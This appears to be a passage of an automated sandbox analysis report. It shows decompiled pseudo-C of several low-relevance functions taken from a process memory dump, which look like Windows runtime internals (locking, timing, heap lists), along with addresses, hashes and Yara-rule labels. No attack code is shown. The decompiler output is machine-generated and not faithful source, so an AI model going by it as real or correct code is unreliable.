					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E053CCC50(E053C4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E053E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E05498ED6(_t102, _t98);
						}
						_t76 = _v44;
						E053E2280(_t58, _v44);
						E053EDD82(_v44, _t102, _t98);
						E053EB944(_t102, _v5);
						return E053DFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x54b8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x54b862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x54b8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x54b862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x548fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x053edbe9
0x053edbf2
0x053edbf7
0x053edbf9
0x053edbfc
0x053edc00
0x053edc03
0x053edc14
0x053edd54
0x053edd54
0x053edd54
0x053edc18
0x053edc1d
0x053edc1d
0x053edc32
0x053edc3b
0x053edc3e
0x053edc46
0x053edd5b
0x053edd62
0x053edd64
0x053edd67
0x053edd69
0x053edd6b
0x053edd6e
0x053edd70
0x053edd73
0x053edd73
0x00000000
0x053edc4c
0x053edc4e
0x05433ae3
0x05433ae8
0x05433aea
0x053edce7
0x053edce9
0x053edcec
0x053edcee
0x053edcf0
0x053edcf3
0x053edcf5
0x05433af2
0x05433af5
0x05433af5
0x053edd06
0x053edd08
0x053edd0b
0x053edd12
0x05433b08
0x053edd18
0x053edd18
0x053edd18
0x053edd20
0x053edd23
0x05433b16
0x05433b16
0x053edd29
0x053edd2d
0x053edd36
0x053edd40
0x053edd51
0x053edd51
0x053edc54
0x053edc59
0x053edc59
0x053edc5e
0x053edc5e
0x053edc63
0x053edc66
0x053edc6b
0x053edc78
0x053edc7b
0x053edc81
0x053edc81
0x053edc83
0x053edc89
0x00000000
0x00000000
0x053edd7b
0x053edd7b
0x053edc8f
0x053edc8f
0x053edc92
0x053edc99
0x053edc9f
0x053edca5
0x053edcaa
0x053edcaa
0x053edcb3
0x053edcb8
0x053edcbb
0x053edcc1
0x053edccf
0x053edcd2
0x053edcd5
0x053edcd7
0x053edcda
0x053edcdc
0x053edcdc
0x053edce2
0x053edce4
0x00000000
0x053edce4

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d382b1cabfc204568240229fbf0c5f307cf1fac190f2655b7c86a3c0fe3097
Instruction ID: 9d63c90240ac4da10e2042054fa279ea8a87a9635edb2455bf0307158c3e5773
Opcode Fuzzy Hash: 23d382b1cabfc204568240229fbf0c5f307cf1fac190f2655b7c86a3c0fe3097
Instruction Fuzzy Hash: 74519DB1A00625DFCF14DF68C490AAEFBF6BF48350F20895ED955A7380DB70A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 053DEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E053DEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E053C9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E053C2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x053def4b
0x053def4d
0x053def57
0x053df0bd
0x053df0c2
0x053df0d2
0x053df0d2
0x053df0c2
0x053def5d
0x053def5f
0x053def67
0x053def6a
0x053def6d
0x053def74
0x053def7f
0x053def82
0x053def82
0x053def86
0x053def88
0x053def8c
0x053def8f
0x053def8f
0x053def8f
0x00000000
0x053def91
0x053def93
0x053defc4
0x053defc4
0x053defc4
0x053defca
0x053defd0
0x053df0a6
0x00000000
0x00000000
0x053df0af
0x0542bb06
0x0542bb0a
0x053df0b5
0x053df0b5
0x053df0b5
0x053df0b5
0x00000000
0x053defd6
0x053defd9
0x053df0de
0x053df0e2
0x053defdf
0x053defdf
0x053defdf
0x053defe5
0x0542bafc
0x0542bafc
0x053defe5
0x053defeb
0x053defed
0x053df00f
0x053df011
0x053df01a
0x053df01d
0x053df021
0x053df028
0x053df029
0x053df029
0x053df02c
0x00000000
0x053df02c
0x053deff3
0x053deff9
0x053df0ea
0x053df0ed
0x053df0ef
0x00000000
0x053df0ef
0x053df003
0x0542bb12
0x053df045
0x053df049
0x053df051
0x053df09e
0x053df0a0
0x053df0a0
0x053df09e
0x053df053
0x053df064
0x053df064
0x053df06b
0x0542bb1a
0x0542bb1a
0x053df071
0x053df071
0x053df07d
0x053df082
0x053df08f
0x053df08f
0x053df009
0x053df00d
0x00000000
0x053df00d
0x053defd0
0x053def97
0x053defa5
0x053defaa
0x00000000
0x053defac
0x053defac
0x053defac
0x00000000
0x053defb2
0x053df036
0x053df03a
0x053df040
0x053df090
0x00000000
0x053df092
0x053df042
0x00000000
0x053df042
0x053defb7
0x053defb9
0x053defbc
0x053defb0
0x053defb0
0x00000000
0x053defbe
0x053defbe
0x053defc1
0x00000000
0x053defc1
0x053defbc
0x053defaa
0x053def91

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: b9c16efbc063f144720036ecaf7ab3559eb5aa97b81bc8d09da396948c0a4e64
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 6D51F332A04245DFDB10CB68E0C4BAEFFBABF05314F1881A9D4569B381C3B5A989D771

Uniqueness

Uniqueness Score: -1.00%

Function 0549740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0549740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0541D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0540F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L053E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L053E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0540F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L053E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0549740d
0x0549740d
0x05497412
0x05497413
0x05497416
0x05497418
0x0549741c
0x0549741f
0x05497422
0x05497422
0x05497428
0x0549742a
0x0549742a
0x05497451
0x05497432
0x0549744f
0x0549744f
0x00000000
0x05497434
0x05497438
0x05497443
0x05497517
0x05497517
0x0549751a
0x05497535
0x05497520
0x05497527
0x0549752c
0x05497531
0x05497533
0x00000000
0x05497533
0x00000000
0x05497531
0x0549754b
0x0549754f
0x0549755c
0x0549755c
0x0549755f
0x05497560
0x05497561
0x05497562
0x05497563
0x05497568
0x0549756a
0x0549756c
0x0549756d
0x0549756d
0x0549756f
0x05497572
0x05497574
0x05497577
0x0549757c
0x0549757f
0x00000000
0x05497551
0x05497551
0x05497551
0x05497553
0x05497553
0x05497449
0x05497449
0x0549744c
0x0549744c
0x00000000
0x0549744c
0x05497443
0x0549750e
0x05497514
0x05497514
0x05497455
0x05497469
0x0549746d
0x00000000
0x05497473
0x05497473
0x05497476
0x05497480
0x05497484
0x0549748e
0x05497493
0x05497493
0x05497496
0x05497499
0x054974a1
0x054974b1
0x054974b5
0x00000000
0x054974bb
0x054974c1
0x054974c1
0x054974c4
0x054974c5
0x054974c6
0x054974c7
0x054974c8
0x054974cd
0x00000000
0x054974d3
0x054974d3
0x054974d6
0x054974d8
0x054974db
0x054974dd
0x054974e0
0x054974e7
0x054974ee
0x054974ee
0x054974f4
0x054974f9
0x00000000
0x054974fb
0x054974fb
0x054974fd
0x05497500
0x05497503
0x05497505
0x05497505
0x054974f9
0x00000000
0x054974cd
0x054974b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 37475e450ec03d93e0b280d08348d04963b18cd99c1ebcde3091323d215ccd44
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: EC515A71600606EFCF59CF14C481A96BBB5FF46314F15C1AAE9089F252E371E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 053F2990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E053F2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x549ff00);
				E0541D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x53a1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0540E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x53a1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E054451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x53a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E053F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E053D6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E053F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E053DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E053F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E053F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E053F2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0541D0D1(_t62);
				goto L28;
			}

0x053f2990
0x053f2992
0x053f2997
0x053f29a3
0x053f29a6
0x053f29ab
0x053f29ad
0x053f29b2
0x05435c80
0x053f29b8
0x053f29b8
0x053f29bb
0x053f29c0
0x053f29c5
0x053f29c6
0x053f29c6
0x053f29cb
0x00000000
0x00000000
0x053f29cd
0x053f29d0
0x053f29d9
0x053f29db
0x053f29dd
0x053f2a7f
0x053f2a84
0x053f2a87
0x053f2a89
0x05435ca1
0x05435ca3
0x00000000
0x053f2a8f
0x053f2a8f
0x00000000
0x053f2a8f
0x00000000
0x053f29e3
0x053f29e3
0x053f29e3
0x00000000
0x053f29e3
0x053f29dd
0x00000000
0x053f29db
0x053f29e6
0x053f29e9
0x053f29eb
0x053f29ed
0x053f29f3
0x053f29f5
0x053f29f8
0x053f29fa
0x053f2a97
0x053f2a9a
0x053f2a9d
0x053f2add
0x00000000
0x053f2a9f
0x053f2aa2
0x053f2aa5
0x053f2aa8
0x053f2aab
0x05435cab
0x05435caf
0x05435cc5
0x05435cda
0x05435cdc
0x05435cdf
0x05435ce5
0x00000000
0x05435ceb
0x05435ced
0x05435cee
0x00000000
0x05435cee
0x05435cb1
0x05435cb4
0x05435cb9
0x05435cbb
0x00000000
0x05435cbd
0x05435cbd
0x00000000
0x05435cbd
0x05435cbb
0x053f2ab1
0x053f2ab1
0x053f2ac4
0x053f2ac6
0x053f2ac6
0x00000000
0x053f2ac6
0x053f2aab
0x00000000
0x053f2a00
0x053f2a09
0x053f2a0e
0x053f2a21
0x053f2a24
0x053f2a35
0x053f2a3a
0x053f2a3d
0x053f2a42
0x053f2a59
0x053f2a59
0x053f2a5c
0x053f2a5f
0x053f2a5f
0x053f29fa
0x053f29f3
0x053f2a64
0x053f2a64
0x053f2a6b
0x053f2a6b
0x053f2a6d
0x053f2a72
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6639d786cf438983d962bc94ff8b20b0754abe398f8b42704760f2e651a559e1
Instruction ID: b73c8bb3ff66ef9641bb06878a9dfa4a831b0b5d1bfb850b9ec823f6b7635452
Opcode Fuzzy Hash: 6639d786cf438983d962bc94ff8b20b0754abe398f8b42704760f2e651a559e1
Instruction Fuzzy Hash: 70515575A00209DFCF25DF95CC80AEFBBB6BF48314F14805AFA11AB260C7759952CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053F4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E053F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x54bd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0540FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x54b7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0540B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L053E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E053CCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0540B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0540F380(_t67 + 0xc, 0x53a5138, 0x10) == 0) {
								 *0x54b60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E053F4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E053F4E70(0x54b86b0, 0x53f5690, 0, 0) != 0) {
					_t46 = E053CCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x053f4d3b
0x053f4d4d
0x053f4d53
0x053f4d58
0x053f4d65
0x053f4d6c
0x053f4d71
0x053f4d77
0x053f4d7f
0x053f4d8c
0x053f4d8e
0x053f4dad
0x053f4db0
0x053f4db7
0x053f4db8
0x053f4db9
0x053f4dba
0x053f4dbb
0x053f4dc1
0x053f4dc8
0x053f4dcc
0x053f4dd5
0x053f4dde
0x053f4ddf
0x053f4de0
0x053f4de1
0x053f4de6
0x053f4de7
0x053f4de9
0x053f4df3
0x00000000
0x00000000
0x05436c7c
0x05436c8a
0x05436c8a
0x05436c9d
0x05436ca7
0x05436cac
0x05436cb2
0x05436cb9
0x00000000
0x05436cbf
0x05436cbf
0x00000000
0x05436cbf
0x05436cb9
0x053f4dfb
0x05436ccf
0x05436cd3
0x053f4e32
0x053f4e39
0x05436ce0
0x05436cf2
0x05436cf2
0x05436ce0
0x053f4e3f
0x053f4e41
0x053f4e51
0x053f4e51
0x053f4e03
0x053f4e03
0x053f4e09
0x053f4e0f
0x053f4e57
0x00000000
0x00000000
0x053f4e1b
0x053f4e30
0x053f4e5b
0x053f4e5b
0x00000000
0x053f4e30
0x053f4e11
0x053f4e11
0x053f4e16
0x00000000
0x053f4e16
0x053f4e01
0x00000000
0x053f4e01
0x053f4da5
0x05436c6b
0x00000000
0x053f4dab
0x053f4dab
0x00000000
0x053f4dab

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ccadcd519a9460488a392402db7e8ee27f946f936db0b6ce823a86ed3ca73ba
Instruction ID: 8d70de5a0cc97e5c8aa67dc191ecf5590dff5e28b9f300d46c7b13b696a79446
Opcode Fuzzy Hash: 3ccadcd519a9460488a392402db7e8ee27f946f936db0b6ce823a86ed3ca73ba
Instruction Fuzzy Hash: B841A171B40318AFEF21DF14CC85FABBBAAEB55710F0040AAEA4597291DBB4DD44CB91

Uniqueness

Uniqueness Score: -1.00%

